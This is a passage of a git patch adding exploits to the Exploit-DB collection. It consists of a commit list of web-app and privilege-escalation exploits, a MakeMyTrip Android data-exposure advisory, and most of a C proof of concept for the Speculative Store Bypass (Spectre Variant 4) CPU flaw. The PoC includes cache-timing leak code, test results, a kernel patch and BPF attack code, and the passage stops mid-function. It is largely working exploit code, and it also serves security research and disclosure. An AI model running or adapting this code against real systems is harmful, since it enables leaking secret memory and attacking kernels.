From 7bbc3238546c7b84f4403336b75c5b2779e20628 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 23 May 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-05-23 20 changes to exploits/shellcodes Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Microsoft Edge Chakra JIT - Magic Value Type Confusion AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read MakeMyTrip 7.2.4 - Information Disclosure Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Microsoft Windows - 'POP/MOV SS' Privilege Escalation Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting Zechat 1.5 - SQL Injection / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting Nordex N149/4.0-4.5 - SQL Injection 
WebSocket Live Chat - Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting PaulPrinting CMS Printing 1.0 - SQL Injection iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery ERPnext 11 - Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Feedy RSS News Ticker 2.0 - 'cat' SQL Injection NewsBee CMS 1.4 - 'download.php' SQL Injection Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting --- exploits/android/local/44690.txt | 24 + exploits/hardware/dos/44695.c | 994 ++++++++++++++++++++++++++++ exploits/hardware/webapps/44684.txt | 48 ++ exploits/java/webapps/44691.txt | 17 + exploits/linux/dos/44693.py | 18 + exploits/linux/local/44688.txt | 30 + exploits/linux/local/44696.rb | 200 ++++++ exploits/linux/webapps/44687.txt | 12 + exploits/linux/webapps/44698.txt | 39 ++ exploits/php/webapps/44685.txt | 87 +++ exploits/php/webapps/44686.txt | 10 + exploits/php/webapps/44689.txt | 27 + exploits/php/webapps/44692.txt | 51 ++ exploits/php/webapps/44699.txt | 54 ++ exploits/php/webapps/44700.txt | 39 ++ exploits/php/webapps/44701.txt | 22 + exploits/php/webapps/44702.txt | 62 ++ exploits/php/webapps/44703.txt | 48 ++ exploits/windows/dos/44694.js | 33 + exploits/windows/local/44697.txt | 7 + files_exploits.csv | 36 +- 21 files changed, 1850 insertions(+), 8 deletions(-) create mode 100644 exploits/android/local/44690.txt create mode 100644 exploits/hardware/dos/44695.c create mode 100644 exploits/hardware/webapps/44684.txt create mode 100644 exploits/java/webapps/44691.txt create mode 100755 exploits/linux/dos/44693.py create mode 100644 exploits/linux/local/44688.txt create mode 100755 exploits/linux/local/44696.rb create mode 100644 exploits/linux/webapps/44687.txt create mode 100644 exploits/linux/webapps/44698.txt create mode 100644 exploits/php/webapps/44685.txt create mode 100644 
exploits/php/webapps/44686.txt
create mode 100644 exploits/php/webapps/44689.txt
create mode 100644 exploits/php/webapps/44692.txt
create mode 100644 exploits/php/webapps/44699.txt
create mode 100644 exploits/php/webapps/44700.txt
create mode 100644 exploits/php/webapps/44701.txt
create mode 100644 exploits/php/webapps/44702.txt
create mode 100644 exploits/php/webapps/44703.txt
create mode 100644 exploits/windows/dos/44694.js
create mode 100644 exploits/windows/local/44697.txt
diff --git a/exploits/android/local/44690.txt b/exploits/android/local/44690.txt
new file mode 100644
index 000000000..2af729fb3
--- /dev/null
+++ b/exploits/android/local/44690.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Android Application MakeMyTrip 7.2.4 - Unencrypted Database Files
+# Date: 2018-05-21
+# Software Link: MakeMyTrip v7.2.4 Android Application
+# Exploit Author: Divya Jain
+# Version: 7.2.4 Android App
+# CVE: CVE-2018-11242
+# Category: Mobileapps
+# Tested on: Android v5.1
+
+# 1. Description
+# Android application folder was found to contain SQLite database files in the following subdirectory
+# data/com.makemytrip/Cache and data/com.makemytrip/databses. This directory is used to store the application’s databases.
+# The confidential information can be retrieved from the SQLite databases and stored in cleartext.
+# As an impact it is known to affect confidentiality, integrity, and availability.
+
+# 2. Proof-of-Concept
+# The successful exploitation needs a single authentication and filesystem can be accessed, after rooting an android device.
+# After accessing the directories below
+
+/data/com.makemytrip/databases/
+/data/com.makemytrip/cache/
+
+# Above directories can be seen with unencrypted version of database files stored in the device
+# which can further lead to sensitive information disclosure.
\ No newline at end of file
diff --git a/exploits/hardware/dos/44695.c b/exploits/hardware/dos/44695.c
new file mode 100644
index 000000000..a0eb96766
--- /dev/null
+++ b/exploits/hardware/dos/44695.c 
@@ -0,0 +1,994 @@
+/*
+======== Intro / Overview ========
+After Michael Schwarz made some interesting observations, we started
+looking into variants other than the three already-known ones.
+
+I noticed that Intel's Optimization Manual says in
+section 2.4.4.5 ("Memory Disambiguation"):
+
+ A load instruction micro-op may depend on a preceding store. Many
+ microarchitectures block loads until all preceding store address
+ are known.
+ The memory disambiguator predicts which loads will not depend on
+ any previous stores. When the disambiguator predicts that a load
+ does not have such a dependency, the load takes its data from the
+ L1 data cache.
+ Eventually, the prediction is verified. If an actual conflict is
+ detected, the load and all succeeding instructions are re-executed.
+
+According to my experiments, this effect can be used to cause
+speculative execution to continue far enough to execute a
+Spectre-style gadget on a pointer read from a memory slot to which a
+store has been speculatively ignored. I have tested this behavior on
+the following processors from Intel and AMD:
+
+ - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]
+ - AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]
+ - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]
+
+I haven't yet tested this on any ARM CPU.
+
+Interestingly, only on the Skylake laptop, it seems to work when
+interrupts and SMP are disabled while the test is running; on the
+other machines, it seems to only work when interrupts are enabled,
+maybe because the kernel code cause some noise that garbles some
+predictor state or so? Or just because they mess up timing
+somewhere...
+
+
+There were mentions of data speculation on the netdev list, in a
+somewhat different context:
+
+https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html
+https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html
+
+However, I'm not entirely sure about the terminology.
Do +"data speculation" and "value speculation" include speculating about +the *source* of data, or do they refer exclusively to directly +speculating about the *value* of data? + + + + + +======== Demo code (no privilege boundaries crossed) ======== +This is some code that purely demonstrates the basic effect and shows +that it is possible to combine it with a Meltdown/Spectre-style +gadget for leaking data into the cache. It does not cross any +privilege boundaries. + +----------------------- START ----------------------- +// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES} +// optionally add: -DNO_INTERRUPTS + +#include +#include +#include +#include + +#define pipeline_flush() asm volatile("mov $0, +%%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ : +"rax","rbx","rcx","rdx","memory") +#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory") + +// source of high-latency pointer to the memory slot +unsigned char **flushy_area[1000]; +#define flushy (flushy_area+500) + +// memory slot on which we want bad memory disambiguation +unsigned char *memory_slot_area[1000]; +#define memory_slot (memory_slot_area+500) + +// 0123456789abcdef +unsigned char secret_read_area[] = "0000011011101011"; +unsigned char public_read_area[] = "################"; + +unsigned char timey_line_area[0x200000]; +// stored in the memory slot first +#define timey_lines (timey_line_area + 0x10000) + +unsigned char dummy_char_sink; + +int testfun(int idx) { + pipeline_flush(); + *flushy = memory_slot; + *memory_slot = secret_read_area; + timey_lines['0' << 12] = 1; + timey_lines['1' << 12] = 1; + pipeline_flush(); + clflush(flushy); + clflush(&timey_lines['0' << 12]); + clflush(&timey_lines['1' << 12]); + asm volatile("mfence"); + pipeline_flush(); + + // START OF CRITICAL PATH + unsigned char **memory_slot__slowptr = *flushy; + //pipeline_flush(); + // the following store will be speculatively ignored since its +address is unknown + *memory_slot__slowptr = 
public_read_area; + // uncomment the instructions in the next line to break the attack + asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ : +/*in*/ : "rax","rbx","rcx","rdx","memory"); + // architectual read from dummy_timey_line, possible +microarchitectural read from timey_line + dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12]; + // END OF CRITICAL PATH + + unsigned int t1, t2; + + pipeline_flush(); + asm volatile( + "lfence\n\t" + "rdtscp\n\t" + "mov %%eax, %%ebx\n\t" + "mov (%%rdi), %%r11\n\t" + "rdtscp\n\t" + "lfence\n\t" + ://out + "=a"(t2), + "=b"(t1) + ://in + "D"(timey_lines + 0x1000 * '0') + ://clobber + "r11", + "rcx", + "rdx", + "memory" + ); + pipeline_flush(); + unsigned int delay_0 = t2 - t1; + + pipeline_flush(); + asm volatile( + "lfence\n\t" + "rdtscp\n\t" + "mov %%eax, %%ebx\n\t" + "mov (%%rdi), %%r11\n\t" + "rdtscp\n\t" + "lfence\n\t" + ://out + "=a"(t2), + "=b"(t1) + ://in + "D"(timey_lines + 0x1000 * '1') + ://clobber + "r11", + "rcx", + "rdx", + "memory" + ); + pipeline_flush(); + unsigned int delay_1 = t2 - t1; + + if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) { + pipeline_flush(); + return 0; + } + if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) { + pipeline_flush(); + return 1; + } + pipeline_flush(); + return -1; +} + +int main(void) { + char out[100000]; + char *out_ = out; + +#ifdef NO_INTERRUPTS + if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3)) + err(1, "iopl(3)"); +#endif + + for (int idx = 0; idx < 16; idx++) { +#ifdef NO_INTERRUPTS + asm volatile("cli"); +#endif + pipeline_flush(); + long cycles = 0; + int hits = 0; + char results[33] = {0}; + /* if we don't break the loop after some time when it doesn't +work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock +up */ + while (hits < 32 && cycles < 1000000) { + pipeline_flush(); + int res = testfun(idx); + if (res != -1) { + pipeline_flush(); + results[hits] = res + '0'; + hits++; + } + cycles++; + pipeline_flush(); + } + 
pipeline_flush(); +#ifdef NO_INTERRUPTS + asm volatile("sti"); +#endif + out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n", +secret_read_area[idx], results, cycles, 100*hits/(double)cycles); + } + printf("%s", out); + pipeline_flush(); +} +----------------------- END ----------------------- + + +Results: + +In the following, "SMP off" means that I have executed this +command: +# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done + +For the Intel machines, "turbo off" means that I've executed the +following command: +# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo + +Skylake laptop, normal: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 +$ ./test +0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%) +0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%) +0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%) +0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%) +0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%) +1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%) +1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%) +0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%) +1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%) +1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%) +1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%) +0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%) +1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%) +0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%) +1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%) +1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%) + +Skylake laptop, SMP off, interrupts off, turbo off: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 
-DNO_INTERRUPTS +$ sudo ./test +0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%) +0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%) +0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%) +0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%) +0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%) +1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%) +1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%) +0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) +1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) +0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) +0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%) +1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) + +Haswell PC, normal: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 +$ ./test +0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%) +0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%) +0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%) +0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%) +0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%) +1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%) +1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%) +0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%) +1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%) +1: 
11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%) +1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%) +0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%) +1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%) +0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%) +1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%) +1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%) + +Haswell PC, SMP off, interrupts off, turbo off: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS +$ sudo ./test +0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%) +0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%) +0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%) +0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%) +0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) +0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%) +0: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) +0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) + +AMD desktop, normal: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 +$ ./test +0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%) +0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%) +0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%) +0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%) +0: 00000000000000000000000000000000 in 
360430 cycles (hitrate: 0.008878%) +1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%) +1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%) +0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%) +1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%) +1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%) +1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%) +0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%) +1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%) +0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%) +1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%) +1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%) + +AMD desktop, SMP off, interrupts off: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS +$ sudo ./test +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: in 1000000 cycles (hitrate: 0.000000%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) + + + + + +======== assisted BPF PoC ======== +This is a PoC that demonstrates that this issue can potentially be +used to attack the Linux kernel's BPF subsystem. 
+This is *NOT* a full exploit against BPF; this is a PoC that requires +kernel patches that permit the PoC to flush kernel memory from inside +BPF and to measure access times to BPF arrays. It seems probable that +these restrictions could be overcome, but my PoC doesn't do that. + +The basic idea here is to cause a speculative type confusion: + +1. Store a number N at address A on the stack. +2. Write a pointer P to address A, using a high-latency + expression to compute A. +3. Read a value X from address A, with A specified using a low-latency + expression. Architecturally, X is P; however, microarchitecturally, + X can be N. +4. Use the Spectre/Meltdown gadget to leak the value X points to into + the cache. + +The attack benefits from the unique property of eBPF that the engine +performs relatively complicated value tracking, but does not +normally use the resulting information to modify the code in any way +(e.g. by optimizing things away). It is not clear how applicable this +attack would be to e.g. other scripting languages, or whether it is an +issue for non-scripting code. + +I have only tested this PoC on an Intel Skylake CPU. + + +Kernel patch required for the PoC to work (copy attached, so that it +applies cleanly), to be applied to the 4.15.1 stable kernel: + +----------------------- START ----------------------- +diff --git a/include/linux/bpf.h b/include/linux/bpf.h +index 0b25cf87b6d6..896b4f483fe2 100644 +--- a/include/linux/bpf.h ++++ b/include/linux/bpf.h +@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto; + extern const struct bpf_func_proto bpf_skb_vlan_pop_proto; + extern const struct bpf_func_proto bpf_get_stackid_proto; + extern const struct bpf_func_proto bpf_sock_map_update_proto; ++extern const struct bpf_func_proto bpf_clflush_mfence_proto; + + /* Shared helpers among cBPF and eBPF. 
*/ + void bpf_user_rnd_init_once(void); +diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c +index 3d24e238221e..379dc888cb81 100644 +--- a/kernel/bpf/helpers.c ++++ b/kernel/bpf/helpers.c +@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = { + .arg1_type = ARG_PTR_TO_UNINIT_MEM, + .arg2_type = ARG_CONST_SIZE, + }; ++ ++BPF_CALL_1(bpf_clflush_mfence, void *, target) { ++ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory"); ++ return 0; ++} ++ ++const struct bpf_func_proto bpf_clflush_mfence_proto = { ++ .func = bpf_clflush_mfence, ++ .ret_type = RET_INTEGER, ++ /* theoretically permits CLFLUSH on invalid addresses, ++ * but the PoC doesn't do that ++ */ ++ .arg1_type = ARG_DONTCARE ++}; +diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c +index 5cb783fc8224..2dd9a2a95630 100644 +--- a/kernel/bpf/syscall.c ++++ b/kernel/bpf/syscall.c +@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr) + return err; + } + ++static int map_time_flush_loc(union bpf_attr *attr) ++{ ++ void __user *ukey = u64_to_user_ptr(attr->key); ++ void __user *uvalue = u64_to_user_ptr(attr->value); ++ int ufd = attr->map_fd; ++ struct bpf_map *map; ++ void *key, *ptr; ++ struct fd f; ++ int err = 0; ++ u64 delay = 0; ++ ++ f = fdget(ufd); ++ map = __bpf_map_get(f); ++ if (IS_ERR(map)) ++ return PTR_ERR(map); ++ ++ if (!(f.file->f_mode & FMODE_CAN_READ)) { ++ err = -EPERM; ++ goto err_put; ++ } ++ ++ if (map->map_type != BPF_MAP_TYPE_ARRAY) { ++ err = -EINVAL; ++ goto err_put; ++ } ++ ++ if (attr->flags > 0x100000 || attr->flags >= map->value_size) { ++ err = -EINVAL; ++ goto err_put; ++ } ++ asm volatile("lfence"); ++ ++ key = memdup_user(ukey, map->key_size); ++ if (IS_ERR(key)) { ++ err = PTR_ERR(key); ++ goto err_put; ++ } ++ ++ rcu_read_lock(); ++ ptr = map->ops->map_lookup_elem(map, key); ++ if (ptr) { ++ unsigned int t1, t2; ++ ptr = (char*)ptr + attr->flags; ++ asm volatile( ++ "xor %%r11, %%r11\n\t" ++ "lfence\n\t" 
++ "rdtscp\n\t" ++ "mov %%eax, %%ebx\n\t" ++ "mov (%%rdi), %%r11b\n\t" ++ "rdtscp\n\t" ++ "mfence\n\t" ++ "clflush (%%rdi)\n\t" ++ "mfence\n\t" ++ ://out ++ "=a"(t2), ++ "=b"(t1) ++ ://in ++ "D"(ptr) ++ ://clobber ++ "r11", ++ "rcx", ++ "rdx", ++ "memory" ++ ); ++ delay = t2 - t1; ++ } ++ rcu_read_unlock(); ++ if (copy_to_user(uvalue, &delay, 8)) { ++ err = -EINVAL; ++ goto free_key; ++ } ++ ++free_key: ++ kfree(key); ++err_put: ++ fdput(f); ++ return err; ++} ++ + #define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags + + static int map_update_elem(union bpf_attr *attr) +@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr +__user *, uattr, unsigned int, siz + case BPF_MAP_UPDATE_ELEM: + err = map_update_elem(&attr); + break; ++ case 0x13370001: ++ err = map_time_flush_loc(&attr); ++ break; + case BPF_MAP_DELETE_ELEM: + err = map_delete_elem(&attr); + break; +diff --git a/net/core/filter.c b/net/core/filter.c +index 1c0eb436671f..e310a345054c 100644 +--- a/net/core/filter.c ++++ b/net/core/filter.c +@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id) + return &bpf_tail_call_proto; + case BPF_FUNC_ktime_get_ns: + return &bpf_ktime_get_ns_proto; ++ case 4: ++ return &bpf_clflush_mfence_proto; + case BPF_FUNC_trace_printk: + if (capable(CAP_SYS_ADMIN)) + return bpf_get_trace_printk_proto(); +----------------------- END ----------------------- + + +The PoC: + +----------------------- START ----------------------- +*/ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define GPLv2 "GPL v2" +#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) + + + +/* registers */ +/* caller-saved: r0..r5 */ +#define BPF_REG_ARG1 BPF_REG_1 +#define BPF_REG_ARG2 BPF_REG_2 +#define BPF_REG_ARG3 BPF_REG_3 +#define BPF_REG_ARG4 BPF_REG_4 
+#define BPF_REG_ARG5 BPF_REG_5 +#define BPF_REG_CTX BPF_REG_6 +#define BPF_REG_FP BPF_REG_10 + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32) (IMM) }), \ + ((struct bpf_insn) { \ + .code = 0, /* zero is reserved opcode */ \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64) (IMM)) >> 32 }) +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) +#define BPF_EMIT_CALL(FUNC) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_CALL, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = (FUNC) }) +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) +#define BPF_LD_ABS(SIZE, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | 
BPF_SIZE(SIZE) | BPF_ABS, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + + + +int bpf_(int cmd, union bpf_attr *attrs) { + return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); +} + +int array_create(int value_size, int num_entries) { + union bpf_attr create_map_attrs = { + .map_type = BPF_MAP_TYPE_ARRAY, + .key_size = 4, + .value_size = value_size, + .max_entries = num_entries + }; + int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); + if (mapfd == -1) + err(1, "map create"); + return mapfd; +} + +unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) { + uint64_t time; + union bpf_attr attr = { + .map_fd = mapfd, + .key = (uint64_t)&idx, + .value = (uint64_t)&time, + .flags = off, + }; + + int res = bpf_(0x13370001, &attr); + if (res) + err(1, "map flush loc"); + return time; +} + +void array_set_dw(int mapfd, uint32_t key, uint64_t value) { + union bpf_attr attr = { + .map_fd = mapfd, + .key = (uint64_t)&key, + .value = (uint64_t)&value, + .flags = BPF_ANY, + }; + + int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr); + if (res) + err(1, "map update elem"); +} + +int prog_load(struct bpf_insn *insns, size_t insns_count) { + char verifier_log[100000]; + union bpf_attr create_prog_attrs = { + .prog_type = 